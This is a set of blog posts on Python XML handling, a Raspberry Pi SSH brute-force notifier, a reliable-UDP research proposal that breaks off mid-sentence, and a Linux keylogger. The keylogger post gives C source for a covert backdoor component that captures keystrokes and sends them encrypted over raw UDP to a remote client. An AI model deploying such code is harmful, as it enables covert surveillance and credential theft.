Parsing and Generating XML in Python
http://crushbeercrushcode.org/2013/03/parsing-and-generating-xml-in-python/
Sun, 03 Mar 2013 00:33:58 +0000 — Daniel Khatkar

Alright bros, I finally got around to writing a post. I will be going through the process of parsing and generating an XML document in Python. Both tasks are fairly simple and extremely useful, considering the number of XML documents you may come across in school or at work.

Parsing XML

The XML file we will be parsing and generating can be seen below.

<note>
        <to>Luke</to>
        <to>Dan</to>
        <from>Kalen</from>
        <heading title="Reminder">
                <body>Don't forget to study!</body>
        </heading>
</note>

The first thing you will want to do is import the Python library that provides functions to parse the XML file. The library I found easiest to use is “xml.dom”, which is included with your Python install. Depending on your coding style, you can import it several ways. I chose to import only the “minidom” module, because it is the only one you need, but you can import the whole package if you wish.

 from xml.dom import minidom

Once you have imported the library, we can begin coding. The first thing you must do is create the “minidom parser”, supplying the path of the XML file when instantiating it. In the example below I have set this object to a variable named “xmldom”. Grabbing an XML element within the file is as simple as calling the getElementsByTagName(“nameOfElement”) method on your minidom object. This method returns a list whose length depends on how many of those elements appear in your XML document. In the XML file above there are two “to” elements, so when we get elements by the name “to”, the returned list has a length of 2.

To get the actual values of each element, we need to iterate through the returned list, which can be done with a for loop. If you know that only one element will be returned from the XML document, you can access it directly, without a for loop. The for loop can be seen in the section of the code below commented “Get and print each element's value”.

To get an attribute of an element, you must first get the element by its name and then access the attribute. This can be seen in the section of the code below commented “Get Attribute”. Since there is only one “heading” element, it is accessed directly instead of with a for loop, as mentioned earlier.

As seen in the example XML document above, the “heading” element also has a child node. To access that child node, you first get the list of “heading” elements, then get the list of child nodes. This can be seen in the code below, under the section commented “Get Child Elements”. Notice that I am accessing the headings list directly here again; if there were more “heading” elements, I would need a for loop.

def parse_xml():
    xmldom = minidom.parse("note.xml")  # path to the XML file shown above

    # Get "to" Elements
    to_list = xmldom.getElementsByTagName("to")

    # Get and print each element's value
    for each in to_list:
        print each.childNodes[0].nodeValue

    # Get Attribute
    headings_list = xmldom.getElementsByTagName("heading")
    title = headings_list[0].getAttribute('title')
    print title

    # Get Child Elements
    child_list = headings_list[0].getElementsByTagName("body")
    print child_list[0].childNodes[0].nodeValue
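If you don't have the file on disk, the same calls work on an in-memory string via parseString. A self-contained sketch (the XML literal simply mirrors the note document above):

```python
from xml.dom import minidom

NOTE = """<note>
    <to>Luke</to>
    <to>Dan</to>
    <from>Kalen</from>
    <heading title="Reminder">
        <body>Don't forget to study!</body>
    </heading>
</note>"""

dom = minidom.parseString(NOTE)

# Each "to" element's text lives in its first child (text) node
names = [n.childNodes[0].nodeValue for n in dom.getElementsByTagName("to")]

heading = dom.getElementsByTagName("heading")[0]
title = heading.getAttribute("title")
body = heading.getElementsByTagName("body")[0].childNodes[0].nodeValue
```

Here names comes back as ["Luke", "Dan"], title as "Reminder", and body as the reminder text.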

Generating XML

Generating XML is even simpler than parsing. The library I use to generate an XML document is lxml, specifically its etree module. Note that lxml is a third-party package (installable with pip), not part of the standard library; the standard library's xml.etree.ElementTree offers a very similar API but lacks the pretty_print option used below. The code below shows how to import it.

from lxml import etree as ET

The code below shows how to generate the XML document provided at the top of this post. You first create a root Element object and add SubElement objects to it. The Element constructor takes the name of your root element. SubElement takes the parent element as its first argument and the name of the new sub-element as its second. You set the value of each element through its “text” attribute. You can also set attributes on each element using the “set” method, which takes the attribute name as the first argument and its value as the second. To generate the XML string, create an ElementTree object by passing in the root element, then pass that ElementTree object to the “tostring()” method. I provide the “pretty_print=True” option to tostring() so the XML document is formatted correctly.

def generate_xml():
    root = ET.Element("note")
    to = ET.SubElement(root, "to")
    to.text = "Luke"
    to = ET.SubElement(root, "to") 
    to.text = "Dan"
    from_var = ET.SubElement(root, "from")
    from_var.text = "Kalen"
    heading = ET.SubElement(root, "heading")
    heading.set("title", "Reminder")
    body = ET.SubElement(heading, "body")
    body.text = "Don't forget to study!"
 
    tree = ET.ElementTree(root)
    xml_string = ET.tostring(tree, pretty_print=True)
    print xml_string
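If installing lxml isn't an option, a similar result can be had with the standard library alone. ElementTree has no pretty_print flag, so one common workaround is to round-trip the serialized tree through minidom's toprettyxml() — a sketch:

```python
import xml.etree.ElementTree as ET
from xml.dom import minidom

root = ET.Element("note")
for name in ("Luke", "Dan"):
    ET.SubElement(root, "to").text = name
ET.SubElement(root, "from").text = "Kalen"
heading = ET.SubElement(root, "heading", title="Reminder")
ET.SubElement(heading, "body").text = "Don't forget to study!"

# Re-parse with minidom purely for its toprettyxml() indentation
xml_string = minidom.parseString(ET.tostring(root)).toprettyxml(indent="    ")
```

The output matches the note document above, just indented by minidom instead of lxml.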

And it is as easy as that! Hopefully someone finds these steps useful, enjoy your coding.

Linux Key Logger
http://crushbeercrushcode.org/2013/01/linux-key-logger/
Sun, 06 Jan 2013 22:31:27 +0000 — Luke Queenan

As part of my covert backdoor application, I created a key logger for a Linux system, written in C. The application was designed to capture global keystrokes and send them back to a listening client using UDP (over raw sockets) in real time. The payload, containing the key press, is encrypted to prevent someone from casually viewing the keystrokes during transmission. Since this was primarily a proof of concept application, there are a few limitations: the application requires root access (for reading the keyboard event file and for raw sockets), the keyboard event file needs to be hard coded, and the key logging process runs in an infinite loop.

This article will discuss the following points:

  • capturing keystrokes
  • creating, encrypting, and sending the UDP packet
  • receiving and displaying the keystrokes on the client
  • further improvements

Capturing Keystrokes

The first step in capturing keystrokes is determining which event file is associated with the keyboard on the compromised system. This can be found by opening a terminal and listing the device symlinks, e.g.:

cd /dev/input/by-path
ls -l

The output of the last command will show the symbolic links for the devices on the computer. You are obviously interested in the keyboard, so make note of the event file associated with it. For example, the system I used had /dev/input/event2 mapped to the keyboard. One more thing to note before we go into the details of capturing the key presses is the format of the events we will read from the event file. Whenever a key is pressed on the system, an event is generated. The events take the following format:

struct input_event {
    struct timeval time;
    __u16 type;
    __u16 code;
    __s32 value;
};
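For reference, these fixed-width fields can also be unpacked in Python with the struct module. The format string below assumes a 64-bit Linux layout (two longs for the timeval, two unsigned shorts, one signed int), so treat it as a sketch:

```python
import struct

# struct input_event: struct timeval (two longs), __u16 type, __u16 code, __s32 value
EVENT_FORMAT = "llHHi"
EVENT_SIZE = struct.calcsize(EVENT_FORMAT)

def parse_events(buf):
    """Yield (sec, usec, type, code, value) tuples from raw event bytes."""
    for offset in range(0, len(buf) - EVENT_SIZE + 1, EVENT_SIZE):
        yield struct.unpack_from(EVENT_FORMAT, buf, offset)
```

Feeding it the bytes read() from the keyboard's event file (root required) yields one tuple per event.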

The following code snippet contains functionality for capturing the key presses. My inline comments should explain most of the code, but the important sections will be discussed below.

void keylogger()
{
#ifdef __linux__
    int keyboard = 0;
    int count = 0;
    int eventSize = sizeof(struct input_event);
    int bytesRead = 0;
    int socket = 0;
    char *buffer = NULL;
    struct input_event event[64];
    struct parseKey *key = NULL;
    struct sockaddr_in din;
 
    // Create the raw socket
    if ((socket = createRawUdpSocket()) == 0)
    {
        return;
    }
 
    // Create the packet structure
    buffer = createRawUdpPacket(&din);
 
    // Open the keyboard input device for listening
    keyboard = open(KEYBOARD_DEVICE, O_RDONLY);
    if (keyboard == -1)
    {
        systemFatal("Unable to open keyboard");
        return;
    }
 
    // Start logging the keys
    while (1)
    {
        // Read a keypress
        bytesRead = read(keyboard, event, eventSize * 64);
 
        // Loop through the generated events
        for (count = 0; count < (bytesRead / eventSize); count++)
        {
            if (EV_KEY == event[count].type)
            {
                if ((event[count].value == KEY_PRESS) || (event[count].value == KEY_HELD))
                {
                    // Find the correct name of the keypress. This is O(n) :-(
                    for (key = keyNames; key->name != NULL; key++)
                    {
                        if (key->value == (unsigned) event[count].code)
                        {
                            // Send the key out
                            sendKey(key->name, socket, buffer, &din);
                            break;
                        }
                    }
                }
            }
        }
    }
#endif
}

The first step is to open the event file for reading, which is done with the open() call, passing the path to the event file you found earlier. After opening the file, we can start reading events from it. Once we have a successful read, we loop through the returned events and perform a few checks to ensure that we are dealing with key press and key held events. Once we have a key press, we linearly search through a table mapping each integer value to the associated key name. This provides human readable output, such as KEY_K and KEY_L. Once we have the key name, it’s time to send it to the client.

Sending Keystrokes

The keystrokes are sent back to the client in the UDP payload over a raw socket. The string is encrypted to prevent a casual observer from determining the contents of the packet. The code snippet below demonstrates encrypting the key press string, adding it to the UDP packet, and sending it to the client over a raw socket. The creation of the IP and UDP headers is not included here.

static void sendKey(char *keyName, int socket, char *buffer, struct sockaddr_in *din)
{
    int packetLength = 0;
    int udpLength = 0;
    int zero = 0;
    int keyLength = 0;
    char date[11];
    char *encryptedField = NULL;
    char *key = NULL;
    struct tm *timeStruct = NULL;
    unsigned short sum = 0;
    time_t t;
 
    // Get the time structs ready
    time(&t);
    timeStruct = localtime(&t);
    strftime(date, sizeof(date), "%Y:%m:%d", timeStruct);
 
    // Get our local information, add 1 for the NULL byte
    key = strndup(keyName, 31);
    keyLength = strnlen(key, 30) + 1;
    packetLength = sizeof(struct udphdr) + keyLength;
 
    // Fill in the UDP length
    udpLength = htons(packetLength);
    memcpy(buffer + sizeof(struct ip) + 4, &zero, sizeof(unsigned short));
    memcpy(buffer + sizeof(struct ip) + 4, &udpLength, sizeof(unsigned short));
 
    // Fill in the IP length
    packetLength += sizeof(struct ip);
    memcpy(buffer + 2, &zero, sizeof(unsigned short));
    memcpy(buffer + 2, &packetLength, sizeof(unsigned short));
 
    // Encrypt and append the keypress and a NULL byte
    encryptedField = encrypt_data(key, date, keyLength + 1);
    memcpy(buffer + sizeof(struct ip) + sizeof(struct udphdr), encryptedField, keyLength);
 
    // Calculate the IP checksum
    memcpy(buffer + 10, &zero, sizeof(unsigned short));
    sum = csum((unsigned short *)buffer, 5);
    memcpy(buffer + 10, &sum, sizeof(unsigned short));
 
    // Send the packet out
    sendto(socket, buffer, packetLength, 0, (struct sockaddr *)din, sizeof(struct sockaddr_in));
 
    // Cleanup
    free(key);
}

The hardest part of creating the packet is counting out the correct number of bytes when using memcpy, to ensure the right field is filled in. Other than that it’s pretty straightforward. The encryption is done using the date, so that the ciphertext varies somewhat from day to day.
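The csum() call in the snippet computes the standard internet checksum (RFC 1071): sum the header as 16-bit words, fold the carries back in, and take the one's complement. A Python rendering of the same fold, for illustration:

```python
def ip_checksum(header):
    """RFC 1071 internet checksum over a byte string."""
    if len(header) % 2:            # pad odd-length input with a zero byte
        header += b"\x00"
    total = 0
    for i in range(0, len(header), 2):
        total += (header[i] << 8) | header[i + 1]
    while total >> 16:             # fold carry bits back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF
```

Running it over the worked example in RFC 1071 (bytes 00 01 f2 03 f4 f5 f6 f7) gives 0x220d.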

Receiving Keystrokes

Receiving the keystrokes on the client makes use of libpcap which provides a framework for low level packet capturing. This allows me to set a tcpdump filter on a network interface card and listen for packets. Once a packet that matches the filter is captured, a callback function is used to deal with the packet. The code snippet below is the callback function used by the client.

void receivedPacket(u_char *args, const struct pcap_pkthdr *header, const u_char *packet)
{
    const struct ip *iph = NULL;
    char *data = NULL;
    char *payload = NULL;
    int ipHeaderSize = 0;
    unsigned short payloadSize = 0;
 
    // Get the IP header and offset value
    iph = (struct ip*)(packet + SIZE_ETHERNET);
#ifdef _IP_VHL
    ipHeaderSize = IP_VHL_HL(iph->ip_vhl) * 4;
#else
    ipHeaderSize = iph->ip_hl * 4;
#endif
 
    if (ipHeaderSize < 20)
    {
        return;
    }
    // Ensure that we are dealing with one of our sneaky TCP packets
#if defined __APPLE__ || defined __USE_BSD
    if (iph->ip_p == IPPROTO_TCP)
#else
    if (iph->protocol == IPPROTO_TCP)
#endif
    {   
        // Get the data and display it
        payload = malloc(sizeof(unsigned long));
        memcpy(payload, (packet + SIZE_ETHERNET + ipHeaderSize + 4), sizeof(unsigned long));
        data = getData(payload, sizeof(unsigned long));
        printf("%.4s", data);
    }
#if defined __APPLE__ || defined __USE_BSD
    else if (iph->ip_p == IPPROTO_UDP)
#else
    else if (iph->protocol == IPPROTO_UDP)
#endif
    {        
        // Get the size of the payload
        memcpy(&payloadSize, (packet + SIZE_ETHERNET + ipHeaderSize + 4), sizeof(unsigned short));
        payloadSize = ntohs(payloadSize);
        payloadSize = payloadSize - sizeof(struct udphdr);
 
        // Get the payload
        payload = malloc(sizeof(char) * payloadSize);
        memcpy(payload, (packet + SIZE_ETHERNET + ipHeaderSize + sizeof(struct udphdr)), payloadSize);
 
        // Get the data and display it
        data = getData(payload, payloadSize);
        printf("%s\n", data);
    }
    free(payload);
}

The section we are concerned with in this article is the UDP branch (the IPPROTO_UDP case near the end of the callback). Once we are sure we have a UDP packet, we determine the size of the payload. Using this value, a memcpy is performed to pull the data out of the packet. The data is decrypted using the date and then printed to the console. The screenshot below shows a demonstration of the client receiving and printing keystrokes to the screen.

[Screenshot: client printing received keystrokes]

Further Improvements

Like I mentioned at the beginning of the article, this was primarily a proof of concept key logger due to time constraints. There are a number of improvements I would make to the program to make it more versatile and usable.

  • Implement the reading in a separate thread. This frees the rest of the backdoor application to respond to additional commands from the client program. The key logger thread would also be controlled by the backdoor application, meaning it could be shut down and restarted at any time by the client.
  • Create a mode where key presses are saved to a hidden file instead of being immediately transmitted back to the client. This would be useful in scenarios where a stealthier approach is needed, as opposed to real time key logging.
  • Implement a map for storing the key names for a faster lookup, O(1) instead of O(n).
  • Save the key presses to a file on the client instead of just printing them to the screen.
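The map from the third bullet is a small change in spirit: replace the linear scan of the keyNames table with a hash lookup. A sketch in Python (the codes shown are the standard Linux input key codes; the subset is illustrative):

```python
# Illustrative subset of the Linux input key-code -> name table
KEY_NAMES = {
    1: "KEY_ESC",
    16: "KEY_Q",
    30: "KEY_A",
    57: "KEY_SPACE",
}

def key_name(code):
    """O(1) dictionary lookup instead of the O(n) scan used in the keylogger."""
    return KEY_NAMES.get(code, "KEY_UNKNOWN")
```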

The full covert backdoor application can be found on my github.

Raspberry Pi SSH LED Notification
http://crushbeercrushcode.org/2012/12/raspberry-pi-ssh-led-notification/
Wed, 26 Dec 2012 23:48:17 +0000 — Kalen Wessel

With finals over and semester break under way, I finally found some time to play around with my second Raspberry Pi. The Raspberry Pi is a great piece of hardware with endless potential for projects. My first rpi has been set up as a dedicated media box, so using it for development purposes wasn’t an option; thankfully these little credit-card-sized computers run $50 a pop, so ordering another one wasn’t a big deal.

I have never dabbled in circuit design, so I figured the rpi would make a good starting point. The RPI has GPIO (General Purpose Input/Output) pins, which allow sensors, LCD devices, LEDs, and other peripherals to be connected to it.

Since keeping track of which pins are what on the rpi can be a PITA, I decided to pick up a cobbler adapter from Adafruit, since it nicely labels what each pin is (5V, 3V, 26, 13, etc.) and plugs into a breadboard easily.

[Photo: cobbler adapter plugged into a breadboard]

Now that I had a way to send signals to and from the breadboard, it was time to start designing my first mini-project. SSH is a service I am constantly using, so I wanted to build something around that. That’s when I came up with the idea of an SSH notifier. Using the already available RPi.GPIO library, I coded up a simple SSH brute force notifier that lets me visually spot potentially malicious traffic.

How it works:

As SSH login attempts occur, the process keeps watching for failed logins by reading the last few lines of the auth log. If it captures 3 failed login attempts in a row from the same IP address, it triggers a red LED for 30 seconds and adds a DROP rule to iptables for the offending IP address. After the LED is turned off, the process waits before checking the logs again. To avoid banning the same IP over and over, a condition checks that the last IP seen is not the same as the IP just banned.
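The detection step boils down to a pure function: scan recent log lines and report an IP that produced three consecutive failed logins. A condensed sketch of that logic (the function name and threshold parameter are my own; the full script appears in the Code section):

```python
import re

IP_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")

def brute_force_ip(lines, threshold=3):
    """Return the IP behind `threshold` consecutive failed logins, else None."""
    streak_ip, streak = None, 0
    for line in lines:
        match = IP_RE.search(line)
        if "Failed password" in line and match:
            if match.group() == streak_ip:
                streak += 1       # same offender as the previous line
            else:
                streak_ip, streak = match.group(), 1
            if streak >= threshold:
                return streak_ip
        else:
            streak_ip, streak = None, 0   # any other line breaks the streak
    return None
```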

After executing the SSH notifier, the auth log looks like this:

pi@raspberrypi ~ $ tail -f /var/log/auth.log
Dec 26 07:28:06 raspberrypi sshd[7438]: pam_unix(sshd:session): session opened for user pi by (uid=0)
Dec 26 07:28:08 raspberrypi sudo:       pi : TTY=pts/0 ; PWD=/home/pi ; USER=root ; COMMAND=/bin/grep pi /etc/shadow
Dec 26 07:28:08 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by pi(uid=0)
Dec 26 07:28:08 raspberrypi sudo: pam_unix(sudo:session): session closed for user root
Dec 26 07:28:19 raspberrypi sudo:       pi : TTY=pts/0 ; PWD=/home/pi ; USER=root ; COMMAND=/sbin/iptables -L
Dec 26 07:28:19 raspberrypi sudo: pam_unix(sudo:session): session opened for user root by pi(uid=0)
Dec 26 07:28:19 raspberrypi sudo: pam_unix(sudo:session): session closed for user root
Dec 26 07:43:23 raspberrypi sshd[5919]: pam_unix(sshd:session): session closed for user pi
Dec 26 08:17:01 raspberrypi CRON[7483]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec 26 08:17:01 raspberrypi CRON[7483]: pam_unix(cron:session): session closed for user root
Dec 26 08:35:27 raspberrypi sshd[7499]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=berlin.local  user=root
Dec 26 08:35:29 raspberrypi sshd[7499]: Failed password for root from 192.168.1.122 port 58201 ssh2
Dec 26 08:35:32 raspberrypi sshd[7499]: Failed password for root from 192.168.1.122 port 58201 ssh2
Dec 26 08:35:34 raspberrypi sshd[7499]: Failed password for root from 192.168.1.122 port 58201 ssh2
Dec 26 08:35:36 raspberrypi sshd[7499]: Failed password for root from 192.168.1.122 port 58201 ssh2
Dec 26 08:35:39 raspberrypi sshd[7499]: Failed password for root from 192.168.1.122 port 58201 ssh2

We can see more than two failed login attempts here, so as soon as the script runs it will pick up the recent lines, find three failed passwords in a row, and ban the IP address, as depicted in the images below.

[Screenshot: ssh-notification process output]

[Screenshot: iptables DROP rule for the banned IP]

With the process running in the background, it will continue to check the logs for brute force attempts and warn me with a visual notification.

Video Demonstration:

Code:

led.py
import RPi.GPIO as GPIO, time
import sys
 
GPIO.setmode(GPIO.BCM)
 
# Takes a pin number from the GPIO
def turnOn(pin):
    LED_pin = pin
    #LED_color = led
    GPIO.setup(LED_pin, GPIO.OUT)
    GPIO.output(LED_pin, True)
    return
# Takes a pin number from the GPIO
def turnOff(pin):
    LED_pin = pin
    #LED_color = led
    GPIO.setup(LED_pin, GPIO.OUT)
    GPIO.output(LED_pin, False)
    return
main.py
#!/usr/bin/env python
# SSH Monitor with LED notification
 
from led import turnOn, turnOff
import array
import time
import os
import re
 
# Path to the SSH auth log file
logfilepath = "/var/log/auth.log"
 
# Function which reads the last 10 lines of a file.
def readFromEnd( f ):
    BUFSIZ = 1024
    f.seek(0, 2)
    bytes = f.tell()
    size  = 10
    block = -1
    data  = []
    while size > 0 and bytes > 0:
        if (bytes - BUFSIZ > 0):
            # Seek back one whole BUFSIZ
            f.seek(block*BUFSIZ, 2)
            # read BUFFER
            data.append(f.read(BUFSIZ))
        else:
            # file too small, start from beginning
            f.seek(0,0)
            # only read what was not read
            data.append(f.read(bytes))
        linesFound = data[-1].count('\n')
        size -= linesFound
        bytes -= BUFSIZ
        block -= 1
    # blocks were read from the end of the file backwards; restore order
    return ''.join(reversed(data)).splitlines()[-10:]
 
attempts   = 0
ip         = []
match      = 0
culprit_ip = 0
 
while True:
	turnOn(18)
	#failedLogin = 2
	file = open(logfilepath, "r")
	# Print one line at a time
	data = readFromEnd(file)
	# Check through the list array
	if (attempts < len(data)):
 
		for num in range(len(data)):
			if (data[num].find("Failed password") > 0):
				temp = data[num]
				ip = re.findall( r'[0-9]+(?:\.[0-9]+){3}', temp)
 
			ip_check = re.findall( r'[0-9]+(?:\.[0-9]+){3}', data[num])
			#print data[num]
			if ((ip == ip_check) and (str(ip).strip('[]') != culprit_ip) and (data[num].find("Failed password") > 0)):
				print ("Match", match, data[num])
				match    += 1
				attempts += 1
			elif ((ip == ip_check) and (str(ip).strip('[]') != culprit_ip) and (data[num].find("Accepted password") > 0)):
				match    = 0
				attempts = 0
			# Check for 3 failed brute force attempts in a row.
			# When that condition is met it activates the LED
			if (match == 3):
				culprit_ip = str(ip).strip('[]')
				print "Potential brute force attempt from", culprit_ip
				# reset match count
				match = 0
				# reset attempts
				attempts = 0
				turnOff(18)
				turnOn(23)
				# Ban IP from server using iptables
				print "Banning IP: ", culprit_ip
				os.system("iptables -A INPUT -s "+culprit_ip+" -j DROP")
				time.sleep(30)
				turnOff(23)	
		match    = 0
		attempts = 0
	print "Searching again"
	time.sleep(5)
Reliable UDP – Research Proposal
http://crushbeercrushcode.org/2012/12/reliable-udp-research-proposal/
Sun, 23 Dec 2012 07:46:13 +0000 — Luke Queenan

This is a research proposal I wrote for one of my classes at BCIT. UDP, while extremely fast, is not a reliable protocol, in the sense that the sender has no way of knowing whether a packet has been received. This proposal examines various other attempts at making UDP reliable and then suggests a new technique.

Problem Statement

UDP is not a reliable protocol due to the absence of acknowledgments, retransmissions, timeouts, and ordering of received datagrams.

Sub-Problems

  1. The UDP protocol (User Datagram Protocol) could be made reliable by implementing, at the very least, a packet acknowledgement system.
  2. Making the protocol reliable must not cause an overly adverse effect on the speed of the protocol.
  3. The protocol will need to actively take advantage of the available throughput on the communication line.
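To make sub-problem 1 concrete, the smallest possible acknowledgement scheme over UDP is stop-and-wait: tag each datagram with a sequence number and retransmit until the peer echoes that number back. A sketch (not the protocol this proposal designs, just an illustration of the idea):

```python
import socket
import struct

def send_reliable(sock, dest, seq, payload, timeout=0.5, retries=3):
    """Stop-and-wait sender: prefix a sequence number, resend until ACKed."""
    packet = struct.pack("!I", seq) + payload
    sock.settimeout(timeout)
    for _ in range(retries):
        sock.sendto(packet, dest)
        try:
            ack, _ = sock.recvfrom(4)
            if struct.unpack("!I", ack)[0] == seq:
                return True              # peer acknowledged this datagram
        except socket.timeout:
            continue                     # lost packet or lost ACK: retransmit
    return False

def recv_and_ack(sock):
    """Receive one datagram, echo its sequence number back as the ACK."""
    data, addr = sock.recvfrom(2048)
    (seq,) = struct.unpack("!I", data[:4])
    sock.sendto(struct.pack("!I", seq), addr)
    return seq, data[4:]
```

Even this toy version shows the trade-off the hypothesis cares about: every lost packet costs at least one timeout interval, which is why sub-problems 2 and 3 matter.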

The Hypotheses

It is hypothesized that UDP can be made reliable while maintaining its overall speed and making use of a given network line’s maximum throughput.

Delimitations

The proposal will not go into the details of congestion and flow control design and existing algorithms.

The proposal will not go into the details of constructing the actual protocol.

The study will not discuss the actual coding implementations of the protocol.

Definition of Terms

Reliability: Reliability means that the protocol would make a “best effort” to deliver the data being transferred using acknowledgments of received packets, retransmissions of un-acknowledged packets, timeouts for lost connections and retransmission timings, ordering of datagrams, and congestion / flow control.

Throughput: Throughput is the number of successfully delivered packets over a given time on a network line.

MD5 Checksum: The Message Digest Algorithm checksum is used to verify the validity of a downloaded file. After running the algorithm on the file, the output should match the result of running the algorithm on the original file. If it does not, the file is corrupted in some way.

Assumptions

The first assumption is that the reader has some basic knowledge regarding the TCP and UDP protocols and their uses.

The second assumption is that the reader knows terms related to the internetworking field.

Importance of the Study

TCP is plagued by congestion and flow control issues on network lines where the length and delay are long and on lines where there is packet loss. Thus, TCP does not always make efficient use of the line’s maximum throughput. Building on the speed of the User Datagram Protocol by implementing reliability would increase the average throughput.

Existing Literature

The following five literature reviews support and demonstrate various aspects of the hypothesis.

The research article entitled “A Reliable UDP for Ubiquitous Communication Environments” outlines the creation of a reliable UDP, or RUDP. The goal was to construct a fast and reliable communication protocol in comparison to an ordinary TCP connection for communication between terminal devices and their servers. In this environment, the terminal devices initiate the communication to the server and maintain this session for a short duration in comparison to TCP. In this sense the communication is event driven, so the maximum number of simultaneous connections to the server should not exceed the number of connected devices. Note that the RUDP protocol does not implement any form of data flow management, which means that it does not attempt to deal with congestion issues it may encounter. In order to achieve reliable delivery of packets, the RUDP protocol uses the following:

  • A three way handshake similar to TCP where a sessionID is created.
  • The sessionID is then used for further communication.
  • A timeout if no ACK is received to recover from packet loss.

After developing the RUDP protocol with these requirements, a comparison test was done between TCP and RUDP. The first test consisted of a client creating up to 12500 threads, each creating packets and connecting to the server. This was done for both TCP and RUDP. The results show that even with the addition of connection setup and packet retransmission on top of UDP, the protocol is much faster than TCP, usually by a factor of three to twelve. There was some noted packet loss under heavier traffic, but this never resulted in performance degradation even with the retransmission of lost packets. The TCP connection was also unable to process more than 4000 packets at a time due to the large number of sessions, but the RUDP protocol was not impacted by this and could handle 12500 simultaneous packets. The second test showed that even with increasing packet sizes, the RUDP protocol maintained its four-times speed increase over TCP. Once packet sizes reached 16384 bytes, both protocols reached their limit due to saturating the network bandwidth. The article concludes that a reliable UDP protocol can be built while still maintaining speed: under test conditions, the protocol was at least four times faster than TCP. The results of this article show promise for a UDP protocol that implements reliability through ACKs and retransmissions along with data flow management for increased reliability and robustness.

In the article “Performance Analysis of Reliable Dynamic Buffer UDP over Wireless Networks”, the authors propose a more sophisticated method of ensuring UDP reliability. This method aims to maintain the raw speed of UDP by implementing a Reliable Dynamic Buffer instead of the standard ACK and retransmission schemes. The article states that the existing reliable protocols, TCP and SCTP, do not meet the speed requirements of complex wireless networks. Given the higher error rate, wireless link costs, host mobility, longer delay, and lower bandwidth on wireless networks, a reliable protocol is needed, so they propose making the aforementioned improvement to UDP. The Reliable Dynamic Buffer UDP adds an additional header to the data portion of the standard UDP packet. This new header contains the following four fields.

  • Sequence Number, similar to TCP’s sequence number where the initial value is randomized when the connection is opened.
  • ACK Number, again similar to TCP’s ACK number where the last received packet is acknowledged.
  • Buffer Size, indicates to the receiver the number of bytes to reserve for out of order packets before the expected packet arrives.
  • A Checksum, which uses the same algorithm used on the UDP and TCP headers.
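The article doesn't give exact field widths, but assuming TCP-like sizes (32-bit sequence and ACK numbers, 16-bit buffer size and checksum), the extra header could be packed like this — purely an illustrative sketch:

```python
import struct

# Assumed layout: 32-bit seq, 32-bit ack, 16-bit buffer size, 16-bit checksum
RDB_HEADER = "!IIHH"

def pack_rdb_header(seq, ack, buffer_size, checksum):
    """Build the 12-byte reliability header prepended to the UDP payload."""
    return struct.pack(RDB_HEADER, seq, ack, buffer_size, checksum)

def unpack_rdb_header(data):
    return struct.unpack(RDB_HEADER, data[:struct.calcsize(RDB_HEADER)])
```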

The article then goes on to compare the Reliable Dynamic Buffer UDP and Reliable UDP in terms of network throughput and delay in wireless networks. The test consisted of one wireless sending node and one wireless receiving node. The results showed that the RDBUDP protocol outperformed the RUDP protocol in both aspects. The throughput test demonstrates the weakness of using ACKs, as the throughput is not smooth and jumps around quite a bit. It is also worth noting that neither protocol can actually reach the total throughput of the link. In terms of delay time, the RDBUDP protocol just barely outperforms the RUDP protocol. The article concludes that in terms of network throughput and delay in wireless networks, the Reliable Dynamic Buffer UDP outperforms the Reliable UDP. Unfortunately they do not provide any data on pure transfer rates. Further research would have to be done to determine whether RDBUDP outperforms RUDP in other aspects as well. Given the complexity of implementing RDBUDP, the buffer method may not provide enough benefit over straight RUDP.

The research article “SABUL: A High Performance Data Transfer Protocol” describes a protocol that uses both TCP and UDP to transfer control messages and data respectively. The article begins by outlining the issues with data transfers over TCP, especially with high bandwidth, long delay networks. In order to overcome these challenges, the research team designed a new protocol called SABUL, or Simple Available Bandwidth Utilization Library. It has the following seven objectives.

  • Reliable data transfer
  • Application level implementation
  • Minimal impact on computing resources
  • Maximum utilization of available bandwidth
  • Respond to network changes
  • Share bandwidth with other connections
  • Memory copy avoidance

The protocol is unidirectional in both respects: data flows one way from the sender to the receiver over UDP, while control information is sent one way from the receiver to the sender over TCP. The protocol’s functionality is relatively simple. The only modification made to the UDP packet is the addition of a 32-bit sequence number used for packet ordering and acknowledgements. The control connection responds to the sender throughout the data transfer with one of three types of packets.

  • ACK: This packet acknowledges that all the packets up to the provided sequence number have been received.
  • ERR: This packet is used as a negative acknowledgment for the provided sequence number.
  • SYN: This packet is used to control sending rates and flow control.
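The data-side framing described above is simple enough to sketch: the only change to a UDP payload is a prepended 32-bit sequence number. A hedged Python illustration (the byte order is an assumption, since the article does not state it):

```python
import struct

def frame_data(seq, payload):
    """Prepend a 32-bit sequence number to the UDP payload, as the
    SABUL data channel does (big-endian byte order assumed)."""
    return struct.pack("!I", seq) + payload

def parse_frame(frame):
    """Split a received frame back into (sequence number, payload)."""
    (seq,) = struct.unpack("!I", frame[:4])
    return seq, frame[4:]
```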

Since the purpose of the SABUL protocol was to transfer data over high-bandwidth, long-delay networks, the researchers’ performance testing was done entirely over these types of networks. The results show that on half of the networks the protocol was tested on, it outperformed TCP and UDP in terms of throughput. On the other two networks it underperformed in comparison to standard TCP and UDP; however, the researchers believe this was due to CPU limits on the machines, since the SABUL protocol requires more overhead. The hybrid approach of combining UDP and TCP to create a reliable protocol is interesting. Building on the inherent reliability of TCP to ensure that control information is received allows for a simpler and smaller UDP packet, leaving more room for data. This also scales well with a multithreaded approach to sending data, since there are two independent connections. Further tests could be done with this protocol over normal networks to compare its speed with that of RUDP.

The next article, entitled “Reliable Blast UDP: Predictable High Performance Bulk Data Transfer”, proposes a protocol for transferring bulk amounts of data. This protocol, like the SABUL protocol, is designed to operate on long-distance, high-speed, high-latency connections rather than the general internet. However, as with the SABUL protocol, it puts forward some interesting ideas that further develop the idea of a reliable general-use UDP protocol. The Reliable Blast UDP protocol uses a dual-protocol approach. Essentially, a file is transmitted in full over the UDP connection while the receiver keeps track of which packets it has received. Upon finishing the file transfer, the sender sends a “done” command to the receiver over a TCP control connection. The receiver responds with an acknowledgment along with a bitmap tally of the received packets. The sender resends the missing packets, and this process repeats until all the packets have been received. To minimize the loss of UDP packets, the send rate must not exceed the lowest bandwidth on the link, and a relatively fast machine is required to receive the UDP packets in a timely fashion. The tests performed by the researchers show that packet loss can be as low as 2-7% when the available bandwidth is calculated 